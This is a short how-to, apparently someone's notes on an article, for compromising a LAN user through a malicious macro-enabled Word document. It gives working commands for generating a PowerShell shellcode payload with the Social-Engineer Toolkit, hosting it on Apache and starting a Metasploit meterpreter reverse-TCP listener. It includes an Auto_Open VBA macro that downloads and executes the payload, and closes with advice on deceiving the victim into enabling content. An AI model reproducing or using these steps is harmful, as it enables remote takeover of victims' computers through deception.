MS Word Macro Exploit
Description:
The following is an article I read on generating an exploit for MS Word and using it to attack a LAN user.
What you will need:
Microsoft Word
The Social-Engineer Toolkit (preinstalled on Kali)
Apache web server (preinstalled on Kali)
The Metasploit Framework (also preinstalled on Kali)
To Resolve:
- Create the payload. On Kali, open a terminal and type:

    setoolkit

- Type 1, then 9, then 1 for the PowerShell alphanumeric shellcode injector.
- Fill in the LHOST variable, which is your IP. This attack assumes you are on the local subnet of your victim. Then fill out LPORT, which is the port you want the attack to come back on. People typically keep this at 4444, but you can choose whatever. Type no to "start listener now".
- Now move the payload to your web server:

    mv /root/.set/reports/powershell/x86_powershell_injection.txt /var/www/html/payload.txt
    service apache2 start

- Now we set up the listener:

    msfconsole
    use multi/handler
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST 10.10.10.200
    set LPORT 4444
    exploit
- Now we need to add the command to our MS Word document.
- Open up a blank MS Word doc, name it something like attack.docm, and make sure that it is macro-enabled.
- Go to the “View” tab => Macros => “Auto_Open” / attack.docm => Create => (paste in the following:)

    ' Word runs Auto_Open / AutoOpen when the document opens and the user has clicked "Enable Content"
    Sub Auto_Open()
        Dim exec As String
        ' the host in the URL must be the web server that is hosting payload.txt
        exec = "powershell.exe ""IEX ((new-object net.webclient).downloadstring('http://10.0.0.13/payload.txt'))"""
        Shell (exec)
    End Sub

    Sub AutoOpen()
        Auto_Open
    End Sub

    ' Workbook_Open is an Excel event; it never fires in Word and simply calls Auto_Open here
    Sub Workbook_Open()
        Auto_Open
    End Sub

- At this point, you may want to obfuscate the code, but many people don’t even know how to get to the macros section of Word, much less what macros even are, so we will skip this step. If you want to know, read the article in the reference (the source).
- Save the document.
- Now we need to convince the victim that the document is safe. The article references word trickery such as “to open the secure document, click ‘Enable Content’”.
References:
“Create & Obfuscate a Virus Inside of a Microsoft Word Document”